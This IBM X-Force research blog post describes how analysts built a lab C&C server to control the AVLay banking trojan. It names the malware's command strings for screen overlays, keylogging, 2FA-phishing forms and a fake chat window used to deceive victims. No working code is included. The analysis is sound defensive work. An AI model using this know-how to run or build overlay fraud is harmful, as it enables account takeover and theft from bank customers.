This is the third installment in a three-part series on the AVLay RAT discovered by IBM X-Force. Parts one and two explained how the researchers reverse engineered the malware. This installment will demonstrate how X-Force gained control of AVLay and fully simulated the overlay attack in its labs.

To simulate AVLay attacks in our labs, we began by creating our own Python server to listen to incoming connections from the Brazilian Delphi-based malware. This server was designed with similar encryption and parsing layers as the AVLay malware itself, allowing us to decrypt the incoming messages and forge messages that the malware client could understand and execute. This was the first step in gaining control over AVLay’s functionality.

Our Python server also requested and parsed screenshots sent by AVLay from remote devices and displayed them via graphical user interface, which allowed us to control it in the same manner as a standard remote session tool would allow.

Since we had the server in place, we were able to test the various command-and-control (C&C) commands available in the code and see how they work.

Simulating a Remote Access Trojan (RAT) in Our Labs

AVLay targets a variety of online banking and other financial applications. In our lab demo, we focused on a cryptocurrency trading platform in Brazil. The image below shows our Python server displaying the view of the victim’s desktop. The terminal is displaying the commands that we implemented in our server.

Figure 1: Our Python server showing screenshots from the victim’s machine (Source: IBM Security)

AVLay does have additional commands for controlling a victim’s machine that are not mentioned in this article, including commands to enable and disable the keylogger, self-terminate the malware process, create custom overlay forms by selecting parts of the window, and more.

The Overlay

The core functionality of the AVLay malware is its ability to launch an overlay attack. This capability relies on the FRAMEFZSYS command for activating overlay screens and FRAMEUFSYS for hiding them.

When the overlay is active, it blocks the victim from accessing the application they were using and takes control of the device. The attacker, who can see the windows underneath the overlay, takes advantage of the remote access capability to launch mouse clicks, or uses the keyboard to control the machine over the network. This can enable the attacker to log in to the targeted bank’s site and initiate fraudulent transactions.

The image below shows the view on a victim’s machine when an overlay is activated:

Figure 2: Victim’s view when the overlay is activated and control over the machine is blocked (Source: IBM Security)

The image below shows the view from the attacker’s device while controlling the victim’s session:

Figure 3: Attacker’s view when the overlay is activated and the attacker has full remote control over the machine (Source: IBM Security)

Two-Factor Authentication Bypass

AVLay has some active screens built in that are designed to require two-factor authorization (2FA) codes. With a single command — COINP1 or COINP2 — an attacker can swiftly adjust the overlay to require additional fields as needed for various transactions.

The malware also has a built-in keylogging feature that can be turned on using the EDKLSYS command. The following two AVLay images show web forms that can be used in fraud attacks:

Figure 4: Fake window for bypassing 2FA via email verification (Source: IBM Security)

Figure 5: Fake window for bypassing 2FA via Google Authenticator (Source: IBM Security)

Fake Chat Window for Real-Time Lies

A recent feature that enables fraudsters to chat with victims in real time was added to AVLay as an additional channel for live social engineering.

The rogue chat window appears to originate in the fake page, and since that page looks like the bank’s page, some users may be duped into communicating with the criminal as their account is being taken over.

AVLay’s chat function uses the OPENCSYS command and is kept hidden by CLOSCSYS. The attacker can manipulate the victim by sending chat messages using the TEXTCSYS command.

Figure 6: Fake chat window as an additional channel of social engineering (Source: IBM Security)

Break One, Stop Many

In this three-part series, we demonstrated a use case for creating a server to control a Brazilian Delphi malware by reverse engineering it. While we demonstrated it with the AVLay malware, the methods and tools we used here can be reused to analyze other malware families in Latin America.

By fully controlling malware that plagues a large user base, we can better understand its underlying abilities and counter them.

Learn how to protect yourself and your customers from fraud

More from Malware

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

X-Force Threat Intelligence Index 2024 reveals stolen credentials as top risk, with AI attacks on the horizon

4 min read - Every year, IBM X-Force analysts assess the data collected across all our security disciplines to create the IBM X-Force Threat Intelligence Index, our annual report that plots changes in the cyber threat landscape to reveal trends and help clients proactively put security measures in place. Among the many noteworthy findings in the 2024 edition of the X-Force report, three major trends stand out that we’re advising security professionals and CISOs to observe: A sharp increase in abuse of valid accounts…

Hive0051’s large scale malicious operations enabled by synchronized multi-channel DNS fluxing

12 min read - For the last year and a half, IBM X-Force has actively monitored the evolution of Hive0051’s malware capabilities. This Russian threat actor has accelerated its development efforts to support expanding operations since the onset of the Ukraine conflict. Recent analysis identified three key changes to capabilities: an improved multi-channel approach to DNS fluxing, obfuscated multi-stage scripts, and the use of fileless PowerShell variants of the Gamma malware. As of October 2023, IBM X-Force has also observed a significant increase in…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today